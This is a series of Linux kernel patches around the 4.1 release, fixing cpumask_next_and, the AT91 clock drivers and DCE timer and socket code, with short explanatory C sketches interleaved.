Miller" Cc: Amir Vadai Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- lib/cpumask.c | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/cpumask.c b/lib/cpumask.c index 5f627084f2e9..5a70f6196f57 100644 --- a/lib/cpumask.c +++ b/lib/cpumask.c @@ -16,11 +16,10 @@ int cpumask_next_and(int n, const struct cpumask *src1p, const struct cpumask *src2p) { - struct cpumask tmp; - - if (cpumask_and(&tmp, src1p, src2p)) - return cpumask_next(n, &tmp); - return nr_cpu_ids; + while ((n = cpumask_next(n, src1p)) < nr_cpu_ids) + if (cpumask_test_cpu(n, src2p)) + break; + return n; } EXPORT_SYMBOL(cpumask_next_and); From 6c7b03e1aef2e92176435f4fa562cc483422d20f Mon Sep 17 00:00:00 2001 From: Boris Brezillon Date: Fri, 27 Mar 2015 23:53:15 +0100 Subject: [PATCH 866/872] clk: at91: pll: fix input range validity check The PLL imposes a certain input range to work correctly, but it appears that this input range does not apply to the input clock (or parent clock) but to the input clock after it has passed the PLL divisor. Fix the implementation accordingly. Cc: # v3.14+ Signed-off-by: Boris Brezillon Reported-by: Jonas Andersson --- drivers/clk/at91/clk-pll.c | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/drivers/clk/at91/clk-pll.c b/drivers/clk/at91/clk-pll.c index 6ec79dbc0840..cbbe40377ad6 100644 --- a/drivers/clk/at91/clk-pll.c +++ b/drivers/clk/at91/clk-pll.c @@ -173,8 +173,7 @@ static long clk_pll_get_best_div_mul(struct clk_pll *pll, unsigned long rate, int i = 0; /* Check if parent_rate is a valid input rate */ - if (parent_rate < characteristics->input.min || - parent_rate > characteristics->input.max) + if (parent_rate < characteristics->input.min) return -ERANGE; /* @@ -187,6 +186,15 @@ static long clk_pll_get_best_div_mul(struct clk_pll *pll, unsigned long rate, if (!mindiv) mindiv = 1; + if (parent_rate > characteristics->input.max) { + tmpdiv = DIV_ROUND_UP(parent_rate, characteristics->input.max); + if (tmpdiv > PLL_DIV_MAX) + return -ERANGE; + + if (tmpdiv > mindiv) + mindiv = tmpdiv; + } + /* * Calculate the maximum divider which is limited by PLL register * layout (limited by the MUL or DIV field size). From 86e4404af2a812935f6c71e7a33e4d0c3aab6538 Mon Sep 17 00:00:00 2001 From: Boris Brezillon Date: Thu, 28 May 2015 14:01:08 +0200 Subject: [PATCH 867/872] clk: at91: fix PERIPHERAL_MAX_SHIFT definition Fix the PERIPHERAL_MAX_SHIFT definition (3 instead of 4) and adapt the round_rate and set_rate logic accordingly.
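For context on the constant: the RSHIFT register field is two bits wide (PERIPHERAL_RSHIFT_MASK is 0x3), so the divider is parent_rate >> shift with shift in 0..3, and once the constant names the largest valid shift (3) the loops have to use <= so that shift == 3 is still tried. A standalone sketch of that selection logic (simplified, not the driver code):

#include <stdio.h>

#define PERIPHERAL_MAX_SHIFT 3   /* 2-bit RSHIFT field: shift is 0..3 */

/* Pick the right-shift divider whose resulting rate is closest to the
 * requested rate; note the inclusive upper bound on the shift. */
static unsigned long pick_rshift_rate(unsigned long parent_rate,
				      unsigned long rate, int *best_shift)
{
	unsigned long best_rate = parent_rate;
	unsigned long best_diff = best_rate > rate ?
				  best_rate - rate : rate - best_rate;

	for (int shift = 0; shift <= PERIPHERAL_MAX_SHIFT; shift++) {
		unsigned long cur = parent_rate >> shift;
		unsigned long diff = cur > rate ? cur - rate : rate - cur;

		if (diff < best_diff) {
			best_diff = diff;
			best_rate = cur;
			*best_shift = shift;
		}
	}
	return best_rate;
}

int main(void)
{
	int shift = 0;
	/* 133 MHz parent, ~16 MHz requested: shift 3 (divide by 8) wins,
	 * which an exclusive '< PERIPHERAL_MAX_SHIFT' loop would never try. */
	unsigned long r = pick_rshift_rate(133000000UL, 16000000UL, &shift);

	printf("best rate %lu with shift %d\n", r, shift);
	return 0;
}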
Signed-off-by: Boris Brezillon Reported-by: "Wu, Songjun" --- drivers/clk/at91/clk-peripheral.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/clk/at91/clk-peripheral.c b/drivers/clk/at91/clk-peripheral.c index 597fed423d7d..df2c1afa52b4 100644 --- a/drivers/clk/at91/clk-peripheral.c +++ b/drivers/clk/at91/clk-peripheral.c @@ -29,7 +29,7 @@ #define PERIPHERAL_RSHIFT_MASK 0x3 #define PERIPHERAL_RSHIFT(val) (((val) >> 16) & PERIPHERAL_RSHIFT_MASK) -#define PERIPHERAL_MAX_SHIFT 4 +#define PERIPHERAL_MAX_SHIFT 3 struct clk_peripheral { struct clk_hw hw; @@ -242,7 +242,7 @@ static long clk_sam9x5_peripheral_round_rate(struct clk_hw *hw, return *parent_rate; if (periph->range.max) { - for (; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (; shift <= PERIPHERAL_MAX_SHIFT; shift++) { cur_rate = *parent_rate >> shift; if (cur_rate <= periph->range.max) break; @@ -254,7 +254,7 @@ static long clk_sam9x5_peripheral_round_rate(struct clk_hw *hw, best_diff = cur_rate - rate; best_rate = cur_rate; - for (; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (; shift <= PERIPHERAL_MAX_SHIFT; shift++) { cur_rate = *parent_rate >> shift; if (cur_rate < rate) cur_diff = rate - cur_rate; @@ -289,7 +289,7 @@ static int clk_sam9x5_peripheral_set_rate(struct clk_hw *hw, if (periph->range.max && rate > periph->range.max) return -EINVAL; - for (shift = 0; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (shift = 0; shift <= PERIPHERAL_MAX_SHIFT; shift++) { if (parent_rate >> shift == rate) { periph->auto_div = false; periph->div = shift; From c49bb94c8430a5697c59fba7a4d876990545d20b Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Wed, 17 Jun 2015 15:22:51 +0200 Subject: [PATCH 868/872] clk: at91: trivial: typo in peripheral clock description Signed-off-by: Nicolas Ferre Signed-off-by: Boris Brezillon --- Documentation/devicetree/bindings/clock/at91-clock.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/devicetree/bindings/clock/at91-clock.txt b/Documentation/devicetree/bindings/clock/at91-clock.txt index 7a4d4926f44e..5ba6450693b9 100644 --- a/Documentation/devicetree/bindings/clock/at91-clock.txt +++ b/Documentation/devicetree/bindings/clock/at91-clock.txt @@ -248,7 +248,7 @@ Required properties for peripheral clocks: - #address-cells : shall be 1 (reg is used to encode clk id). - clocks : shall be the master clock phandle. e.g. clocks = <&mck>; -- name: device tree node describing a specific system clock. +- name: device tree node describing a specific peripheral clock. * #clock-cells : from common clock binding; shall be set to 0. * reg: peripheral id. See Atmel's datasheets to get a full list of peripheral ids. From 28df9c2fb6f896179fcffd5a3f5a86e2d1dff0a5 Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Thu, 28 May 2015 15:07:21 +0200 Subject: [PATCH 869/872] clk: at91: fix h32mx prototype inclusion in pmc header Trivial fix for a build failure of this pmc clock driver when the h32mx clock is present but the smd clock isn't.
Signed-off-by: Nicolas Ferre Signed-off-by: Boris Brezillon Acked-by: Alexandre Belloni Fixes: bcc5fd49a0fd ("clk: at91: add a driver for the h32mx clock") Cc: # 3.18+ --- drivers/clk/at91/pmc.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/clk/at91/pmc.h b/drivers/clk/at91/pmc.h index 52d2041fa3f6..af2c99195541 100644 --- a/drivers/clk/at91/pmc.h +++ b/drivers/clk/at91/pmc.h @@ -120,7 +120,7 @@ extern void __init of_at91sam9x5_clk_smd_setup(struct device_node *np, struct at91_pmc *pmc); #endif -#if defined(CONFIG_HAVE_AT91_SMD) +#if defined(CONFIG_HAVE_AT91_H32MX) extern void __init of_sama5d4_clk_h32mx_setup(struct device_node *np, struct at91_pmc *pmc); #endif From b953c0d234bc72e8489d3bf51a276c5c4ec85345 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 21 Jun 2015 22:05:43 -0700 Subject: [PATCH 870/872] Linux 4.1 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 3ba504496cb2..f5c8983aeeb7 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc8 +EXTRAVERSION = NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From b2f5c938b995ed171ca53bf299c8928698fadc9f Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Wed, 24 Jun 2015 15:16:42 +0900 Subject: [PATCH 871/872] lib: delete unused functions Clean up the unused functions lib_sock_canrecv and lib_sock_cansend, which have existed since the beginning of DCE. Signed-off-by: Hajime Tazaki --- arch/lib/lib-socket.c | 40 ---------------------------------------- 1 file changed, 40 deletions(-) diff --git a/arch/lib/lib-socket.c b/arch/lib/lib-socket.c index d9be5fc2af41..75760c774288 100644 --- a/arch/lib/lib-socket.c +++ b/arch/lib/lib-socket.c @@ -242,46 +242,6 @@ int lib_sock_getsockopt(struct SimSocket *socket, int level, int optname, return err; } -int lib_sock_canrecv(struct SimSocket *socket) -{ - struct socket *sock = (struct socket *)socket; - struct inet_connection_sock *icsk; - - switch (sock->sk->sk_state) { - case TCP_CLOSE: - if (SOCK_STREAM == sock->sk->sk_type) - return 1; - case TCP_ESTABLISHED: - return sock->sk->sk_receive_queue.qlen > 0; - case TCP_SYN_SENT: - case TCP_SYN_RECV: - case TCP_LAST_ACK: - case TCP_CLOSING: - return 0; - case TCP_FIN_WAIT1: - case TCP_FIN_WAIT2: - case TCP_TIME_WAIT: - case TCP_CLOSE_WAIT: - return 1; - case TCP_LISTEN: - { - icsk = inet_csk(sock->sk); - return !reqsk_queue_empty(&icsk->icsk_accept_queue); - } - - default: - break; - } - - return 0; -} -int lib_sock_cansend(struct SimSocket *socket) -{ - struct socket *sock = (struct socket *)socket; - - return sock_writeable(sock->sk); -} - /** * Struct used to pass pool table context between DCE and Kernel and back from * Kernel to DCE From a0997f4cbd627b81b3fd97d27958ddf16c649bb9 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 25 Jun 2015 20:37:06 +0900 Subject: [PATCH 872/872] lib: ensure to clear pending timer list on del_timer This overly strict sanity check causes a !timer_pending() assertion in mod_timer() when mod_timer() is called on a timer that has already been deleted.
Fixes: 793e2d6a3069 ('lib: add sanity checks to list_del operation') Signed-off-by: Hajime Tazaki --- arch/lib/timer.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/lib/timer.c b/arch/lib/timer.c index 87d2283a4e01..94b3f5cf6d2f 100644 --- a/arch/lib/timer.c +++ b/arch/lib/timer.c @@ -141,8 +141,8 @@ int del_timer(struct timer_list *timer) retval = 0; if (timer->entry.prev != LIST_POISON2) { list_del(&timer->entry); - timer->entry.next = NULL; } + timer->entry.next = NULL; return retval; }
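The triggering sequence is simply re-arming a timer that has already expired and been del_timer()'d: the "not pending" branch used to leave entry.next holding the stale value left behind by the earlier list removal, so a later mod_timer() looked like it was touching a pending timer. Below is a hypothetical module-style sketch of that call pattern against the 4.1-era timer API; the assertion itself only exists in the arch/lib (DCE) build, so this is an outline of the sequence rather than a self-contained reproducer.

#include <linux/module.h>
#include <linux/timer.h>
#include <linux/jiffies.h>

static struct timer_list demo_timer;

static void demo_expire(unsigned long data)
{
	/* When the timer fires it is unlinked from the pending list,
	 * leaving stale/poisoned list pointers behind in the entry. */
}

static int __init demo_init(void)
{
	setup_timer(&demo_timer, demo_expire, 0);
	mod_timer(&demo_timer, jiffies + HZ / 10);

	/* ...later, after demo_expire() has run... */

	del_timer(&demo_timer);               /* not pending: old code skipped clearing entry.next */
	mod_timer(&demo_timer, jiffies + HZ); /* used to trip the !timer_pending() assert in DCE */
	return 0;
}

static void __exit demo_exit(void)
{
	del_timer_sync(&demo_timer);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");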